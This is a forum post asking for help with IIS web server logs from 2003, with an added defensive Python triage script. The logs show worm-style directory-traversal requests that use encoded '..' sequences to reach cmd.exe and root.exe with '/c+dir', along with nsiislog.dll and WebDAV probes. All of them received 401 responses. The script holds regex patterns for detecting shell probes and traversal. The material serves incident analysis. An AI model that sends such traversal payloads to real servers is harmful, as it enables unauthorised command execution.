Hi guys, I don't know much about log files... but looking at these snippets, it seems to me that someone tried to launch the command prompt or something else! And yet port 80 is closed on the firewall!!
First there's this piece: look at the time!
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-10-11 01:28:41 62.194.101.101 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-11 02:57:17 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:18 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:20 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:22 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:24 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:25 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:28 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:29 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:31 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:33 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
And here?
2003-10-13 16:24:07 152.99.72.82 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /scripts/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /MSADC/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:36 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
Could you help me? Thanks

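A defender's triage of the log format quoted in the post, as an added example that is not part of the original post: it reads the `#Fields` header, percent-decodes each URI stem and groups the flagged requests by client IP together with whether any of them got a status below 400. The rule names and the `parse` and `triage` functions are assumptions of this example; the sample entries are copied from the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# A few entries copied from the post above (IIS, W3C extended log format).
SAMPLE = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-10-11 01:28:41 62.194.101.101 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-11 02:57:17 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /scripts/root.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:36 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
"""

# Assumed triage rules, matched against "<method> <decoded stem>", lower-cased.
RULES = [
    ("shell-probe", re.compile(r"(cmd|root)\.exe$")),
    ("path-traversal", re.compile(r"\.\.[\\/]")),
    ("nsiislog-probe", re.compile(r"/nsiislog\.dll$")),
    ("webdav-options", re.compile(r"^options ")),
]

def parse(text):
    """Yield one dict per log entry, keyed by the latest #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and line and not line.startswith("#"):
            values = line.split(" ", len(fields) - 1)
            if len(values) == len(fields):  # skip truncated entries
                yield dict(zip(fields, values))

def triage(text):
    """Group flagged requests by client IP; "served" counts statuses below 400."""
    report = defaultdict(lambda: {"tags": set(), "hits": 0, "served": 0})
    for entry in parse(text):
        target = f'{entry["cs-method"]} {unquote(entry["cs-uri-stem"])}'.lower()
        tags = {name for name, rx in RULES if rx.search(target)}
        if tags:
            row = report[entry["c-ip"]]
            row["tags"] |= tags
            row["hits"] += 1
            row["served"] += int(entry["sc-status"]) < 400
    return dict(report)

if __name__ == "__main__":
    for ip, row in triage(SAMPLE).items():
        print(ip, sorted(row["tags"]), "hits:", row["hits"], "served:", row["served"])
```

On these entries every flagged request was answered with 401, so `served` is 0 for all three clients.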